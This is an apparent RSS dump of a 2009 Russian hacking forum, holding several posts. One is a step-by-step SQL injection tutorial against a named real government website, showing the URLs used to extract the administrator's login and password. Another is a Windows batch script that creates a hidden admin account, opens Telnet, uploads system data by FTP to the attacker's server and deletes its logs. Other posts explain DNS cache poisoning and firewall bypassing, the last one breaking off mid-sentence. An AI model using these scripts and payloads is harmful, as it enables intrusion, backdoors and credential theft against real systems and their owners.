http://sapog.forumbb.ru/ САПОГ ru-ru Fri, 20 Nov 2009 17:16:33 +0300 MyBB/mybb.ru http://sapog.forumbb.ru/viewtopic.php?pid=53#p53 <p><span style="color: maroon"><span style="font-size: 16px">Круто!!!</span></span>&#160; :crazyfun:</p> mybb@mybb.ru (koka) Fri, 20 Nov 2009 17:16:33 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=53#p53 http://sapog.forumbb.ru/viewtopic.php?pid=52#p52 <p>Привет хацкеры,кул хацкеры и новички!С вами redbu11.В этой статье пойдёт речь о такой уязвимости как </p> <p>SQL injection.Я знаю что таких статей в инете немеряно,но всё-таки я напишу ещё одну статейку о </p> <p>такой уязвимости.Я написал эту статью для тех у кого ещё не сформировалась идея о этой уязвимости,то </p> <p>есть новичкам в этом деле.То что я буду рассказывать,совсем не новое,Так что расчитана для </p> <p>новичков.Я думаю вы все знаете что такое SQL уязвимость,а если нет,то поищите в инете,там много про </p> <p>это написано,просто если я щас начну объяснять что это такое в больших подробностях,то это займёт </p> <p>много времени.И так приступим.))<br />Для обнаружения SQL инъекции я чаще всего пользуюсь манипулированием числовыми параметрами в GET </p> <p>запросах.Вот например меня как-то заинтересовала такая ссылка:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng.php?id=58</a></p> <p>тут id=58 и есть числовой параметр.Итак,проверим её на уязвимость.В конец ссылки добавляем одиночную </p> <p>кавычку '.</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58'" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng.php?id=58'</a></p> <p>И смотрим на результат.Опа!Страница загрузилась неправильно и выдала нам SQL ошибку:</p> <p>Open Database: Invalid query<br />SELECT * FROM tbl_berita where berita_id=57'</p> <p>Ура!Это и есть SQL уязвимость.Но чтобы убедиться что уязвимость действительно существует,проверим </p> <p>ещё кое-что.ПЕреходим опять по адресу:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng.php?id=58</a></p> <p>И видим там страницу с заголовком &quot;KOMNAS FBPI CONTINUES BIRD FLU CONTROL PROGRAM&quot;.Ок,теперь </p> <p>перейдём на страничку &quot;ниже&quot;,не на 58-ую а на 57-ую,то есть так:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=57" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng.php?id=57</a></p> <p>И видим там страницу уже с другим заголовком &quot;Air Batu Asahan Villagers Are Confirmed Bird Flu </p> <p>Negative&quot;.Теперь переходим обратно на 58-ую страницу:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng.php?id=58</a></p> <p>Теперь когда мы знаем что 58-ая страница имеет заголовок &quot;KOMNAS FBPI CONTINUES BIRD FLU CONTROL </p> <p>PROGRAM&quot; а 57-ая имеет заголовок &quot;Air Batu Asahan Villagers Are Confirmed Bird Flu Negative&quot; то </p> <p>проверим переменную &quot;id&quot; на уязвимость и составим такой запрос:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58-1/*" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng.php?id=58-1/*</a></p> <p>(Всегда закрываем символом /*)И смотрим на результат.В результате загрузилась не 58 а 57 </p> <p>страница.Ура!!!Уязвимость действительно есть!А что это значит?С предыдущим запросом мы попытались </p> <p>выполнить простую арифметическую операцию,то есть 58-1,и сайт её не отвильтровал а выполнил,и в </p> <p>результате мы получили 58-1=57,это означает что вместо этого мы можем вставить любой другой запрос </p> <p>который нам будет более полезен.Мы сейчас будем пытаться вытащить с помощью этой уязвимости из базы </p> <p>данных логин и пасс админа.И так,сначало нам надо выяснить сколько полей в базе данных.Я для этого </p> <p>использую оператор &quot;order+by&quot;.И так проверим сколько-же там полей используя order+by:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+order+by+30/*" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; er+by+30/*</a></p> <p>На такой запрос нам выдалась ошибка,это означает что полей меньше чем 30.Пробуем так:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+order+by+20/*" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; er+by+20/*</a></p> <p>На это нам тоже выдалась ошибка,значит полей меньше 20-и.Пробуем дальше:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+order+by+10/*" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; er+by+10/*</a></p> <p>На это нам не выдалось никакой ошибки,это означает что полей или 10,или больше 10-и.Продалжаем в </p> <p>этом-же духе пока не обнарушем верное количество полей:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+order+by+15/*" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; er+by+15/*</a></p> <p>Страница снова загрузилась с ошибкой,это означает что полей меньше чем 15,пробуем так:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+order+by+14/*" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; er+by+14/*</a></p> <p>Уряяя!Страница 14 загрузилась нормально,а 15-ая загружалась с ошибкой,это означает что полей </p> <p>всего-лишь 14,это нам только наруку.Теперь зная что полей 14,посмотрим какое из них принтабельное,то </p> <p>есть с помощью какого поле выводиться информация.Для этого нам нужно воспользоваться оператором </p> <p>&quot;union+select&quot;,составляем запрос,делаеться это так:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; 12,13,14/*</a></p> <p>Смотрим на результат,когда страница загрузиться,прокручиваем страницу до самого низа,и мы увидим что </p> <p>там отоброжаеться цифра 9,это означает что для вывода информации используеться 9-ое поле.<br />Ну вот теперь когда мы знаем что в базе только 14 полей и использутся 9-ое принтабельное,переходим к </p> <p>следующему этапу,будем долбить базу данных и пробовать вытащить оттуда логип и пасс Админа.))Нам щас </p> <p>нужно проверить существует ли в базе данных таблици с названием типа users,user,admin И т.д...Это </p> <p>тоже делаеться с оператором union+select.Нам щас нужен логин и пасс админа,давайте начнём с </p> <p>логина.Для того чтоб узнать логин,нам надо проверить существует ли в базе данных таблица с названием </p> <p>name,или login,где и храниться логин.Теперь мы и будем проверять на наличие всех этих таблиц.Делаем </p> <p>это как я уже говорил оператором union+select таким образом:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; 3,14+from+</a></p> <p>users/*</p> <p>Этим мы проверяем существует ли таблица users в базе данных,если такая существует,то страница </p> <p>загрузиться без ошибки,а если такой нет,то загрузиться с ошибкой.Нам на это выдалась ошибка,значет </p> <p>такой нет.Проверим есть ли таблица users:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+user/" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; 3,14+user/</a></p> <p>*</p> <p>к сожалению и такой не оказалось,тоже нам на это выдалась ошибка...((Но не надо </p> <p>расстраиваться!Многие админы используют префиксы перед названием таблицы.Теперь обратите внимание на </p> <p>ту ошибку которая нам выводиться:</p> <p>Open Database: Invalid query<br />SELECT * FROM tbl_berita where berita_id=57'</p> <p>Посмотрите там на этот текст: tbl_berita<br />Тут используеться префикс tbl_ перед названием таблицы.Давайте проверим существует ли таблица user </p> <p>используя этот префикс!Ок,делаем запрос:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+tbl_u" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; 3,14+tbl_u</a></p> <p>ser/*</p> <p>Есть!Ура!Страница загрузилась нормально,значит таблица tbl_user существует!Теперь попробуем достать </p> <p>имя пользователя из таблицы tbl_user.Проверим,существует ли запись с названием name в таблицы </p> <p>tbl_user.Это делаесть почти также,только в 9-ое поле вставляем слово name,этим мы и будем проверять </p> <p>существует ли запись name в таблицы tbl_user.Этот запрос будет выглядеть так:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,name,10,11,12,13,14+tb" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; 2,13,14+tb</a></p> <p>l_user/*</p> <p>Посмотрим что мы на это получем,А нам на это страница загрузилась нормально,значит есть </p> <p>такая!Прокручиваем страничку в самый низ,и видим там запись &quot;Administrator&quot;,Ураа!!У нас теперь есть </p> <p>логин админа,осталось достать пасс.Пробуем:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,1" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; 11,12,13,1</a></p> <p>4+tbl_user/*</p> <p>На это нам страница загрузилась с ошибкой,это означает что нет записи password,пробум так:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,passwd,10,11,12,13,14+" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; ,12,13,14+</a></p> <p>tbl_user/*</p> <p>На это тоже выдалась ошибка,,такой тоже нет((пробуем дальше:</p> <p><a href="http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,pwd,10,11,12,13,14+tbl" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/berita_eng. &#8230; ,13,14+tbl</a></p> <p>_user/*</p> <p>Даа!Страница загрузилась без ошибки,и это значит что запись!!!Прокручиваем страницу в самый низ и </p> <p>там мы видим пасс админа!!!Осталось его расшифровать и всё!!!<br />Потом переходим сюда <a href="http://www.komnasfbpi.go.id/admin" rel="nofollow" target="_blank">http://www.komnasfbpi.go.id/admin</a> вводим полученные данные,и всё,дальше всё </p> <p>зависит от вашей фантазии!<br />Вот и всё,всё о чём бы я с вами хотел бы поделиться.Я описал просенькую SQL инъекцию.</p> <p>ВНИМАНИЕ!Автор не несёт никакой ответственности за некорректное использование размещённой здесь </p> <p>информации!Всё что здесь размещено,это не пробуждения к действию,а всего-лишь для ознакомительных </p> <p>целей!</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:43:19 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=52#p52 http://sapog.forumbb.ru/viewtopic.php?pid=51#p51 <p>1. DNS с высоты птичьего полета</p> <p>Служба доменных имен представляет собой распределенную базу данных, основным содержанием которой является информация о соответствии символических имен сетевых объектов их IP-адресам. DNS организована по иерархическому принципу. Структурной единицей этой базы является домен (domain), который в свою очередь может содержать другие домены (поддомены). <br />Первичным источником информации о каждом домене является ответственный за данный домен DNS-сервер (на самом деле их может быть несколько). Ответственность за часть доменной информации (поддомены) может быть делегирована другим серверам. <br />Клиентская часть DNS называется резолвером (resolver), доступ к которому прикладные программы получают через API операционной системы. При взаимодействии резолвера с сервером в качестве транспортного протокола используется UDP, не предусматривающий формирования виртуального канала. Запросы, генерируемые резолвером, являются рекурсивными, т.е. в качестве ответа на такой запрос возвращается либо искомая информация, либо сообщение о ее отсутствии. <br />Получив запрос от резолвера, сервер либо сразу же возвращает ответ (при условии наличия искомой информации в локальной базе), либо формирует запрос к другому серверу. Этот запрос обычно является итеративным и, в отличие от рекурсивного, допускает ответ в виде ссылки на другой сервер, который лучше осведомлен о месте расположения искомой информации. <br />В общем случае поиск начинается с корневого сервера, который возвращает информацию о серверах, ответственных за домены верхнего уровня, после чего формируется новый итеративный запрос к одному из этих серверов и т.д. Результатом такой цепочки вопросов-ответов является либо получение искомой информации, либо вывод о ее отсутствии, после чего полученный ответ возвращается резолверу. Вся накопленная сервером в процессе работы информация кэшируется с целью ускорения обслуживания последующих запросов и минимизации сетевого трафика.</p> <p>2. Межсегментная удаленная атака на DNS-сервер</p> <p>Возможность атаки на DNS путем фальсификации ответа DNS-сервера известна довольно давно (см., например, Медведовский И.Д., Семьянов П.В., Платонов В.В. Атака через Internet. - СПб.: &quot;Мир и семья-95&quot;, 1997.). Объектом атаки может являться как резолвер, так и DNS-сервер. Причины успеха подобных атак кроются в легкости подделки ответа сервера. Протоколы DNS, используемые в настоящее время, не предусматривают каких либо средств проверки аутентичности полученных данных и их источника, полностью полагаясь в этом на нижележащие протоколы транспортного уровня. Используемый транспортный протокол (UDP) с целью повышения эффективности не предусматривает установления виртуального канала и использует в качестве идентификатора источника сообщения IP-адрес, который может быть элементарно подделан. <br />При наличии у атакующего возможности перехвата сообщений, которыми обмениваются клиент и сервер (внутрисегментная атака) реализация атаки не представляет каких либо трудностей. Однако этот вариант не представляет и значительного практического интереса, поскольку возможность внутрисегментной атаки предполагает наличие определенного взаимного расположения клиента, сервера и хоста атакующего (например, атакующий и целевой DNS-сервер разделяют общую физическую среду передачи), что на практике реализуется довольно редко. <br />Значительно более общим случаем является межсегментная атака, не требующая для своей реализации столь жестких условий. По этой причине мы остановимся на рассмотрении именно этого класса удаленных атак, представляющих как академический, так и практический интерес. <br />Межсегментная атака на DNS-сервер выглядит следующим образом. Предположим для определенности, что целью атаки является &quot;подмена&quot; IP-адреса web-сервера wwwcoolsite.com на IP-адрес сервера wwwbadsite.com для пользователей некоторой подсети, которую обслуживает DNS-сервер ns.victim.com. В первой фазе атаки ns.victim.com провоцируется на поиск информации о IP-адресе wwwcoolsite.com путем посылки ему соответствующего рекурсивного запроса. Во второй фазе атакующий посылает серверу ns.victim.com ложный ответ от имени ns.coolsite.com, который является ответственным за домен coolsite.com. В ложном ответе вместо реального IP-адреса wwwcoolsite.com указывается IP-адрес wwwbadsite.com. Сервер ns.victim.com кэширует полученную информацию, в результате чего в течении определенного промежутка времени (величина этого промежутка указывается в поле TTL ложного ответа и может произвольно выбираться атакующим) ничего не подозревающие пользователи вместо сервера wwwcoolsite.com попадают на wwwbadsite.com. <br />Для того, чтобы ложный ответ был воспринят сервером ns.victim.com как истинный, достаточно выполнения четырех условий: </p> <p>• IP адрес отправителя ответа должен соответствовать IP-адресу запрашиваемого сервера (в нашем случае ns.coolsite.com); <br />• UDP-порт, на который направляется ответ, должен совпадать с портом, с которого был послан запрос; <br />• идентификатор ответа должен совпадать с идентификатором запроса; <br />• ответ должен содержать запрашиваемую информацию (в нашем случае IP-адрес web-сервера wwwcoolsite.com). </p> <p>Очевидно, что выполнение первого и четвертого условий не представляет для атакующего особых трудностей. Со вторым и третьим условиями ситуация намного сложнее, поскольку в случае межсегментной атаки у атакующего нет возможности перехватить исходный запрос и &quot;подсмотреть&quot; необходимые параметры. <br />Большинство используемых в настоящее время реализаций DNS-сервера (BIND4, MS DNS) используют для исходящих запросов 53 порт, так что можно &quot;на удачу&quot; послать ложный ответ на этот порт. Однако данный метод будет срабатывать не всегда, поскольку, например, BIND8 может использовать для исходящих запросов любой случайно выбранный непривилегированный порт. <br />Идентификатор (id) запроса представляет собой двухбайтовое число, указываемое сервером в запросе с целью однозначной идентификации ответа на данный запрос. Это число инкрементируется с каждым новым запросом. Незнание текущего значения идентификатора приводит к необходимости посылки множества ложных ответов с различными значениями id. <br />Именно это обстоятельство делает практическую реализацию данной атаки очень трудноосуществимой. Действительно, ложный ответ должен быть получен целевым сервером в промежуток времени с момента посылки запроса и до момента прихода ответа от настоящего сервера, что на практике составляет не более нескольких секунд. За этот интервал времени атакующему необходимо послать 216 ложных ответов со всеми возможными значениями id, а в случае незнания порта эта цифра увеличивается еще в несколько десятков раз. Поскольку размер IP-пакета, содержащего ложный ответ, составляет около 100 байт, то перед атакующим ставится задача пересылки нескольких мегабайт информации за несколько секунд, что в подавляющем большинстве случаев неосуществимо. </p> <p>3. Метод определения номера порта и текущего идентификатора запроса</p> <p>При выполнении дополнительного условия даже в случае межсегментной атаки у атакующего есть возможность определения текущего id запроса и номера порта. Таким условием является наличие контролируемого атакующим DNS-сервера, ответственного за любой домен. Контроль над сервером в данном контексте означает возможность перехвата всех запросов, адресованных данному серверу. Это возможно либо если атакующий непосредственно владеет сервером (является его администратором), либо разделяет с ним общую физическую среду передачи (в случае ethernet это означает нахождение в одном коллизионном домене). Очевидно, что данное условие не является слишком жестким, поскольку нахождение в одном коллизионном домене с DNS-сервером достаточно типично для многих пользователей корпоративных сетей. <br />При наличии контролируемого сервера описанная атака может быть модифицирована следующим образом. Предположим для определенности, что атакующий контролирует сервер ns.hacker.com, ответственный за домен hacker.com. В первой фазе атаки мы провоцируем сервер ns.victim.com на обращение к ns.hacker.com путем посылки рекурсивного запроса на поиск информации о любом имени (не обязательно реальном) в домене hacker.com. Поскольку ns.hacker.com находится под контролем атакующего, он может перехватить этот запрос и извлечь из него информацию о номере порта и текущем id. <br />Последующие две фазы атаки не отличаются от описанных, с той лишь разницей, что теперь атакующему достаточно послать всего несколько ложных ответов, поскольку он точно знает номер порта и может с высокой степенью точности предсказать значение идентификатора запроса к ns.coolsite.com. </p> <p>4. Метод косвенной провокации</p> <p>Очевидно, что необходимым условием успешности описанной атаки является возможность посылки рекурсивных запросов целевому серверу, провоцирующих его на обращение к другим серверам с целью поиска запрашиваемой информации. В принципе, существует возможность настроить DNS-сервер таким образом, что он будет принимать рекурсивные запросы только от &quot;своих&quot; клиентов (хостов, резолверы которых настроены на использование данного сервера). В этом случае осуществление атаки становится невозможным. <br />С целью обхода этого ограничения можно предложить простой метод, который условно назовем &quot;косвенной провокацией&quot;. Основная идея этого метода заключается в использовании любого общедоступного сервиса, являющегося клиентом целевого DNS-сервера, для формирования необходимого провоцирующего запроса. Наиболее подходящим кандидатом представляется общедоступный сервер электронной почты, который по определению должен принимать соединения с любого компьютера Internet. Предположим, что резолвер компьютера mail.victim.com настроен на использование сервера ns.victim.com, причем последний принимает рекурсивные запросы только от домена victim.com. Приведенный ниже SMTP-диалог провоцирует ns.victim.com на поиск информации о имени any-name.any-domain.com: <br />$ telnet mail.victim.com 25<br />Trying...<br />Connected to mail.victim.com.<br />Escape character is '^]'.<br />220 mail.victim.com ESMTP Sendmail 8.8.0/8.8.0; Wed, 5 May 1999 21:30:42<br />helo I.am.cracker<br />250 mail.victim.com Hello crack.hacker.com [1.1.1.1], pleased to meet you<br />mail from: user@any-name.any-domain.com<br />250 user@any-name.any-domain.com... Sender ok<br />quit<br />221 mail.victim.com closing connection<br />Connection closed.</p> <p>Таким образом, применение метода &quot;косвенной провокации&quot; позволяет осуществить атаку без прямой посылки запросов целевому DNS-серверу.</p> <p>5. Как возникают эпидемии</p> <p>В обычных условия успешная атака приводит к &quot;заражению&quot; кэша конкретного сервера и область распространения ложной информации ограничивается только его клиентами. Однако при наличии ситуации &quot;некорректного делегирования&quot; (lame delegation), возникающей из-за ошибок администрирования, возможно распространение ложной информации на другие сервера, что приведет к глобальному &quot;заражению&quot;. <br />Под некорректным делегированием понимается ситуация, когда ответственность за домен делегируется серверу, не обладающему локальной копией доменной информации. Это приводит к тому, что в ответ на итеративные запросы других серверов вместо искомой информации он возвращает ссылки на другие сервера (иногда и на себя), которые, с точки зрения данного сервера, располагают нужными сведениями. <br />Рассмотрим ситуацию, когда для домена victim.com существуют два ответственных сервера - ns.victim.com и ns2.victim.com, причем для ns2.victim.com делегирование выполнено некорректно. Применяя описанные методы, атакующий может &quot;заразить&quot; кэш сервера ns2.victim.com ложной информацией о именах в домене victim.com, например, подменить IP-адрес web-сервера wwwvictim.com на IP-адрес wwwvery-bad-site.com. Поскольку ns2.victim.com считается ответственным за домен victim.com, другие сервера в Internet будут обращаться к нему за информацией о именах в этом домене. Не располагая локальной копией доменной информации о victim.com, данный сервер будет возвращать в ответ ранее кэшированную ложную информацию, приводя к &quot;заражению&quot; всех обратившихся к нему серверов. <br />Неприятной особенностью данного сценария является невозможность быстрой ликвидации последствий атаки, поскольку ложная информация будет находиться в кэшах тысяч серверов до истечения времени жизни, которое атакующий может выбрать очень большим. </p> <p>6. Реализация и полевые испытания</p> <p>Программа, реализующая атаку на DNS-сервер с использованием контролируемого сервера, стала доступна в Internet примерно в феврале 1999 года. К счастью, использование этой программы не сводится к вводу в окошко IP-адреса целевого сервера и нажатию кнопки &quot;Infect It!&quot;, а требует достаточно глубокого понимания принципов работы DNS, что сразу же отсеивает 99% потенциальных пользователей. Кроме того, в известной автору реализации сделано далеко не все для повышения вероятности успеха атаки. <br />С целью обеспечения чистоты эксперимента &quot;полевые испытания&quot; были проведены на трех неподконтрольных автору корпоративных сетях. Естественно, администраторы этих сетей были поставлены в известность и не возражали против проведения эксперимента. Как это ни печально, во всех трех случаях атака была успешной. <br />Диапазон целей, которые могут быть достигнуты при помощи атаки на DNS, простирается от &quot;отказа в обслуживании&quot; и подмены web-сайтов до перехвата сообщений электронной почты и полного контроля над информацией, передаваемой между произвольно выбранными хостами Internet. При всем этом атакующий практически не оставляет следов, поскольку ему нет необходимости посылать провоцирующие запросы и ложные ответы с собственного IP-адреса. </p> <p>7. Взгляд с другой стороны баррикады</p> <p>По мнению автора, в настоящее время единственным надежным средством противодействия описанной атаке является использование стандартизированных в RFC2065 расширенных протоколов DNS, предусматривающих применение криптографических методов аутентификации доменной информации и субъектов сетевого взаимодействия. Базовая поддержка этого стандарта уже включена в текущую версию BIND8. <br />К сожалению, желаемый результат может дать только широкомасштабное внедрение новых протоколов, которое сопряжено со значительными организационными трудностями и не может быть проведено за короткое время. <br />Несколько затруднить осуществление атаки может запрет на обслуживание DNS-сервером рекурсивных запросов, поступающих не от &quot;своих&quot; клиентов. Это может быть сделано как средствами самого сервера (например, BIND8 обладает такими возможностями), так и средствами межсетевого экрана. Следует обратить внимание на настройку &quot;антиспуффинговых&quot; правил фильтрации на межсетевом экране, поскольку атакующий в качестве IP-адреса отправителя запроса может указать любой адрес, в том числе и легального клиента. <br />При использовании данного метода не следует забывать, что подобная защита может быть достаточно легко преодолена использованием описанного метода косвенной провокации.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:42:24 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=51#p51 http://sapog.forumbb.ru/viewtopic.php?pid=50#p50 <p>Я полный новичок, так что прошу сильно не пинать ! Я знаю что про Telnet написано выше крыши, но йя хотел бы показать слегка доведенный до ума скрипт.</p> <p>Тело скрипта:<br />net user &gt; c:windowsuser.log //Собирает инфу о Юзверях<br />ipconfig /all &gt; c:windowsipconf.log //Собирает и запихивает в файл инфу про IP<br />route print &gt; c:windowsroute.log //Собирает и запихивает в файл инфу о сетевых маршрутах<br />net share &gt; c:windowsshare.log // Инфа о ресурсах<br />ver &gt; c:windowsver.log //Ну и самое главное, версия и сборка винды)))<br />chcp 1251 //Кусок кода дальше я позаимствовал в статье &quot;Взлом через Telnet&quot; или как-то так...<br />net user SUPPORT_388945a0 /delete<br />net user hacker hack /add<br />net localgroup Администраторы hacker /add<br />net localgroup Пользователи SUPPORT_388945a0 /del<br />sc config tlntsvr start= auto<br />tlntadmn config port=972 sec=-NTLM<br />net start Telnet<br />reg add &quot;HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList&quot; /v hacker /t REG_DWORD /d 00000000<br />ftp -s:TAR_BZ.TXT //Здесь подрубаемся к FTP и скидываем данные себе на комп (При этом задействуется левый фаил в катором содержется код для FTP)<br />del c:windowsuser.log //Здесь зачищаем следы...<br />del c:windowsipconf.log<br />del c:windowsroute.log<br />del c:windowsshare.log<br />del c:windowsver.log<br />exit //Без комментариев</p> <p>Вот тело TAR_BZ.TXT (я незнаю почему йя его так назвал....):<br />open xxx.xxx.xxx.xxx //Залазим на свой FTP (место xxx.xxx.xxx.xxx ставим IP (желательно свой:)))<br />login //Здесь пишем логин<br />pass //Здесь пасс<br />put c:windowsuser.log //Логи идут к нам... )))<br />put c:windowsipconf.log<br />put c:windowsroute.log<br />put c:windowsshare.log<br />put c:windowsver.log<br />bye //Отрубаемся от FTP</p> <p>Работает это (если кто непонял) так, запустив файл, жертва (подставляет сама себя)))) тупо скидывает все данные о инете и открывает Telnet на порте 972. Мы тупо ищем<br />IP жертвы и лезем на его комп под логином &quot;hacker&quot;, и пассом &quot;hack&quot;. И все, мы на ящике жертвы, и тут полная свобода действий. Можно отключив, допустим Касперыча, кинуть троян и запустить отдаленно.<br />На этом все. И запомните, я не несу никакой ответственности за ваши действия на чужом компе, ибо йя привел пример....</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:40:48 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=50#p50 http://sapog.forumbb.ru/viewtopic.php?pid=49#p49 <p>Большинство корпоративных сетей ограждено по периметру недемократично настроенными брандмауэрами, защищающими внутренних пользователей от самих себя и отпугивающими начинающих хакеров. Между тем, для опытного взломщика даже качественный и грамотно настроенный брандмауэр – не преграда.</p> <p>Брандмауэр (он же фаервол) в общем случае представляет собой совокупность систем, обеспечивающих надлежащий уровень разграничения доступа, достигаемый путем управления проходящим трафиком по более или менее гибкому набору критериев (правил поведения). Короче говоря, брандмауэр пропускает только ту часть трафика, которая явно разрешена администратором и блокирует все остальное.</p> <p>На рынке доминируют два типа брандмауэров – пакетные фильтры, также называемые шлюзами фильтрации пакетов (packet filter gateway), и программные прокси (application proxy). Примером первого типа является Firewall от компании Check Point, а второго – Microsoft Proxy Server.</p> <p>Пакетные фильтры полностью прозрачны для пользователей и весьма производительны, однако недостаточно надежны. Фактически они представляют собой разновидность маршрутизаторов, принимающих пакеты как извне, так и изнутри сети, и решающих, как с ними поступить – пропустить дальше или уничтожить, при необходимости уведомив отправителя, что его пакет сдох. Большинство брандмауэров этого типа работает на IP-уровне, причем полнота поддержки IP-протокола и качество фильтрации оставляют желать лучшего, поэтому атакующий может легко их обмануть. На домашних компьютерах такие брандмауэры еще имеют смысл, но при наличии даже плохенького маршрутизатора они лишь удорожают систему, ничего не давая взамен, так как те же самые правила фильтрации пакетов можно задать и на маршрутизаторе!</p> <p>Программные прокси представляют собой обычные прокси-сервера, прослушивающие заданные порты (например, 25, 110, 80) и поддерживающие взаимодействие с заранее оговоренным перечнем сетевых сервисов. В отличие от фильтров, передающих IP-пакеты &quot;как есть&quot;, прокси самостоятельно собирают TCP-пакеты, выкусывают из них пользовательские данные, наклеивают на них новый заголовок и вновь разбирают полученный пакет на IP, при необходимости осуществляя трансляцию адресов. Если брандмауэр не содержит ошибок, обмануть его на сетевом уровне уже не удастся; к тому же, он скрывает от атакующего структуру внутренней сети – снаружи остается лишь брандмауэр. А для достижения наивысшей защищенности администратор может организовать на брандмауэре дополнительные процедуры авторизации и аутентификации, «набрасывающиеся» на противника еще на дальних рубежах обороны. Это были достоинства. Что же касается недостатков, то программные прокси ограничивают пользователей в выборе приложений. Они работают намного медленнее пакетных фильтров и здорово снижают производительность (особенно на быстрых каналах). </p> <p>Брандмауэры обоих типов обычно включают в себя более или менее урезанную версию системы определения вторжений (Intruder Detection System, IDS), анализирующую характер сетевых запросов и выявляющую потенциально опасные действия - обращение к несуществующим портам (характерно для сканирования), пакеты с TTL, равным единице, (характерно для трассировки) и т.д. Все это существенно затрудняет атаку, и хакеру приходится действовать очень осторожно, поскольку любой неверный шаг тут же выдаст его с поторохами. Однако интеллектуальность интегрированных систем распознавания достаточна невелика, и большинство уважающих себя администраторов перекладывает эту задачу на плечи специализированных пакетов, таких, как Real Secure от Internet Security System.</p> <p>В зависимости от конфигурации сети брандмауэр может быть установлен на выделенный компьютер или может делить системные ресурсы с кем-нибудь еще. Персональные брандмауэры, широко распространенные в мире Windows, в подавляющем большинстве случаев устанавливаются непосредственно на сам защищаемый компьютер. Если этот пакетный фильтр реализован без ошибок, то защищенность системы ничуть не страдает и атаковать ее так же сложно, как и на выделенном брандмауэре. Локальные программные прокси защищают компьютер лишь от некоторых типов атак (например, блокируют засылку троянов через IE), оставляя систему полностью открытой. В UNIX-like-системах пакетный фильтр присутствует изначально, а в штатный комплект поставки входит большое количество разнообразных прокси-серверов, поэтому приобретать дополнительное программное обеспечение не нужно.<br />От чего защищает и от чего не защищает брандмауэр</p> <p>Пакетные фильтры в общем случае позволяют закрывать все входящие/исходящие TCP-порты, полностью или частично блокировать некоторые протоколы (например, ICMP), препятствовать установке соединений с данными IP-адресами и т.д. Правильно сконфигурированная сеть должна состоять, по меньшей мере, из двух зон: внутренней корпоративной сети (corporative network), огражденной брандмауэром и населенной рабочими станциями, сетевыми принтерами, intranet-серверами, серверами баз данных и прочими ресурсами подобного типа; а также демилитаризованной зоны (demilitarized zone, или, сокращенно, DMZ), в которой расположены публичные сервера, доступные из интернета. Брандмауэр, настроенный на наиболее драконический уровень защищенности, должен:<br />закрывать все порты, кроме тех, что принадлежат публичным сетевым службам (HTTP, FTP, SMTP и т.д.);<br />пакеты, приходящие на заданный порт, отправлять тем и только тем узлам, на которых установлены соответствующие службы (например, если WWW-сервер расположен на узле А, а FTP-сервер на узле B, то пакет, направленный на 80 порт узла B, должен блокироваться брандмауэром);<br />блокировать входящие соединения из внешней сети, направленные в корпоративную сеть (правда, в этом случае пользователи сети не смогут работать с внешними FTP-серверами в активном режиме);<br />блокировать исходящие соединения из DMZ-зоны, направленные во внутреннюю сеть (исключая FTP- и DNS-сервера, которым исходящие соединения необходимы);<br />блокировать входящие соединения из DMZ-зоны, направленные во внутреннюю сеть (если этого не сделать, то атакующий, 